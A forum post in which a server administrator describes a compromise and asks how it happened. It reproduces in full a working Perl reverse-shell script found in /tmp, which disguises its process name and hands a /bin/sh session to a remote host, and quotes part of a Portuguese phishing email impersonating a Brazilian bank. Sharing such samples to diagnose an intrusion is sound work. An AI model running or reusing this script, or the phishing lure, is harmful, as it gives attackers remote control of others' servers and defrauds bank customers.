Hello.

Today I found a /tmp script (/tmp/back/).
I have APF firewall and anti-DoS, secured tmp's and modsecurity2 on apache2 running gotroot rules.

How can it is possible to write a perl file on /tmp? File has not run permitions, but is a Perl file, so I think they ran it. I found this script after someone to send mail bomb through the server (about 9000 each time).

Server simptoms:
several connections from my server to ftp.hosteurope.de
several phishing emails being sent over my server

Script code:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Email Bazilian content:
(...) Estamos fazendo atualizações críticas em nossos servidores, por esse motivo é necessário o recadastro de seus dados cadastrais para ter acesso a todos os serviços do Internet Banking Caixa.
Para realizar a atualização, basta baixar o programa de atualização da Caixa que segue link abaixo. (...)
How can server possible be compromised?

Any help will be appreciated.

Regards.